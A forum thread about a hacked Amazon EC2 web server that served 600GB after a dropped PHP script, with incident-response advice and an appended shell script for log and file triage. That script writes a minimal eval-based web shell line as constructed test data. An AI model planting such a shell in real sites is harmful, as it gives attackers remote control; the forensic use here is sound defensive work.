If someone downloaded 600GB, can that be a DoS attack?


Last night someone exploited some vulnerability in my site and then uploaded a PHP script to my images folder.

I have an Amazon EC2 server with CentOS.

Then the hacker downloaded 600GB and increased my bill.

Can this be a DoS attack? How can I check this?

While the hacker was downloading I saw:

  • CPU usage being 100%
  • many Apache kworker processes running
  • I stopped the Apache service but data was still being transmitted

I then stopped my instance.

How can I see what happened?

user22

Posted 2013-09-05T06:16:59.860


http://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server and http://security.stackexchange.com/questions/23842/advice-on-what-to-do-after-being-hacked are worth reading. The third thing you mentioned might indicate your system itself was compromised – Journeyman Geek – 2013-09-05T06:19:42.570

If data was transmitted even with Apache being turned off, I'd suggest you set up a new instance. – slhck – 2013-09-05T06:20:17.997

@slhck I knew what happened: there was a vulnerability in my site which the hacker exploited. It was this http://www.bugreport.ir/78/exploit.htm . I deleted those scripts and now the system is OK. I know it was those scripts. I checked the last modified files in /var/www/html and then I found those files. I had maldetect installed and it also gave me the report and removed three files, but it didn't remove the other 2 PHP files which were also viruses. I had to remove them, and they were causing the issue.

– user22 – 2013-09-05T06:33:02.393

Is it relevant what happened? You already know the vulnerability that was exploited, so you know you can prevent a repeat by killing the server, acquiring a new one, and setting that up with the patched Joomla version. – Jan Doggen – 2013-09-05T07:54:33.800

Answers


Partial answer, as your question is unclear: you have changed terminology between the title and the body, and you have asked multiple questions without question marks, so I'm unsure if I missed something that was meant to be a question.

  • DDoS stands for distributed denial of service
  • DoS stands for denial of service

This was not a DDoS attack given the information provided. If you killed your Apache server you kind of performed a DoS attack on yourself, as you denied the service of your web page.

If the CPU was at 100% usage it probably can be defined as a DoS attack, as it was unlikely to be servicing pages during this time.

As for finding out what happened, check the logs and monitoring tools you had active at the time, or contact Amazon to see if they can provide any more insight on the network traffic you attracted.

50-3



How can I contact Amazon regarding that? Will they help me? – user22 – 2013-09-05T06:29:58.253

It's unlikely Amazon will investigate this any further. Your web server has been hacked, and that happens every day, probably thousands of times. Get over it and reinstall the machine – especially if you already know what the vulnerability was, why care for what exactly happened? – slhck – 2013-09-05T06:38:04.143

If they are billing for the network traffic, wouldn't they have an obligation to show that network data? It would really only isolate a time. He will still have to re-install and try and learn some more about security. – 50-3 – 2013-09-05T06:42:47.070

But I have fixed the vulnerability now and deleted the hacker's scripts. Can't I just keep my server? – user22 – 2013-09-05T06:49:23.787

Did you restore from a back-up then patch or patch over the "Removed" scripts? – 50-3 – 2013-09-05T06:50:13.853

I have removed the scripts, but I have the Amazon snapshots for every day, so I can restore to the one from 3 days ago, and I don't have any data changed between that time, so I can go back to the previous snapshot – user22 – 2013-09-05T06:55:45.990

Coming from a corporate company with massive server farms all round the world: restore a snapshot, confirm the malicious files are not present and then patch. You have no real idea what happened during this incident; play it safe, because I have seen what happens when you don't, and you don't want that! – 50-3 – 2013-09-05T07:03:02.680

Thanks buddy, I followed your advice and the system is up and running from the previous snapshot. AWS made that too easy to restore. What can I do to prevent this? I wonder why maldetect detected half the files but not the other half – user22 – 2013-09-05T07:14:58.243
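The answer's advice to "check logs" and the asker's own approach of looking at the last modified files under /var/www/html, worked through as an added example that is not part of the original thread. It assumes the CentOS/Apache defaults (a web root like /var/www/html, an access log in the "combined" format like /var/log/httpd/access_log); the web root, the log lines, the IPs and the file name up.php are all constructed stand-ins so the script runs offline. It answers the three things the thread leaves open: which file was dropped, which client drove it and how much it pulled, and whether the logged egress accounts for the billed volume.

```shell
#!/bin/sh
# Added example (not from the original thread): offline triage of the two
# artefacts the answer points at, the web root and the Apache access log.
# Everything below is constructed sample data; the CentOS paths are assumptions.

WORK=$(mktemp -d "${TMPDIR:-/tmp}/triage.XXXXXX")
trap 'rm -rf "$WORK"' EXIT

# --- 1. Constructed web root: a PHP file dropped into images/ next to a real image.
WEBROOT="$WORK/html"                      # stands in for /var/www/html
mkdir -p "$WEBROOT/images"
printf '<?php eval($_POST["c"]); ?>\n' > "$WEBROOT/images/up.php"   # stand-in web shell
printf 'PNG\n' > "$WEBROOT/images/logo.png"

# --- 2. Constructed access log in Apache "combined" format (assumed log format).
#     Field 1 = client IP, 6 = method, 7 = path, 9 = status, 10 = bytes sent.
LOG="$WORK/access_log"                    # stands in for /var/log/httpd/access_log
cat > "$LOG" <<'EOF'
198.51.100.7 - - [04/Sep/2013:22:58:03 +0000] "GET /index.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Sep/2013:23:01:12 +0000] "POST /index.php HTTP/1.1" 200 312 "-" "curl/7.19"
203.0.113.5 - - [04/Sep/2013:23:01:40 +0000] "POST /images/up.php HTTP/1.1" 200 64 "-" "curl/7.19"
203.0.113.5 - - [04/Sep/2013:23:02:05 +0000] "GET /images/up.php?f=dump.bin HTTP/1.1" 200 1073741824 "-" "curl/7.19"
203.0.113.5 - - [04/Sep/2013:23:09:51 +0000] "GET /images/up.php?f=dump.bin HTTP/1.1" 200 1073741824 "-" "curl/7.19"
198.51.100.7 - - [04/Sep/2013:23:10:00 +0000] "GET /images/logo.png HTTP/1.1" 304 - "-" "Mozilla/5.0"
EOF

# PHP files under an images/ directory modified in the last $2 days.
# An image folder should never contain executable scripts.
recent_php_in_images() {   # $1 = web root, $2 = days
    find "$1" -type f -name '*.php' -path '*/images/*' -mtime "-$2" 2>/dev/null
}

# Every request that hit a PHP file under images/: the attacker driving the shell.
shell_hits() {             # $1 = access log
    awk '$7 ~ "/images/[^ ]*[.]php" { gsub(/"/, "", $6); print $1, $6, $7, $9, $10 }' "$1"
}

# Requests and bytes sent per client, biggest egress first ("-" = no body sent).
bytes_by_client() {        # $1 = access log
    awk '{ req[$1]++; if ($10 != "-") bytes[$1] += $10 }
         END { for (c in req) printf "%s %d %.0f\n", c, req[c], bytes[c] + 0 }' "$1" |
        sort -k3,3nr
}

# Total gigabytes Apache logged as sent; compare with the egress on the bill.
# A large gap means traffic left through something other than httpd, which is
# also what "data still flowing after Apache was stopped" points at.
total_gb() {               # $1 = access log
    awk '$10 != "-" { t += $10 } END { printf "%.3f\n", t / 1e9 }' "$1"
}

# Live check while the box is still up (needs root; not run in this example):
# which process owns each established TCP connection. Anything sending that is
# not httpd is what to look at before restoring a snapshot.
established_sockets() {
    ss -tnp | awk '$1 == "ESTAB"'
}

echo "== PHP files under images/ modified in the last 3 days"
recent_php_in_images "$WEBROOT" 3
echo "== Requests to PHP under images/ (ip method path status bytes)"
shell_hits "$LOG"
echo "== Bytes sent per client (ip requests bytes)"
bytes_by_client "$LOG"
echo "== Total GB logged by Apache"
total_gb "$LOG"
```

On a real box, point WEBROOT and LOG at the live paths (and at the rotated access_log-* files for the night in question) before the instance is rebuilt; the restored snapshot loses the logs of the incident, so copy them off first. If the bytes Apache logged fall far short of what the bill shows, the web shell was not the only thing sending, which is the scenario the commenters warn about, and the established_sockets check is the one to run before the instance is stopped.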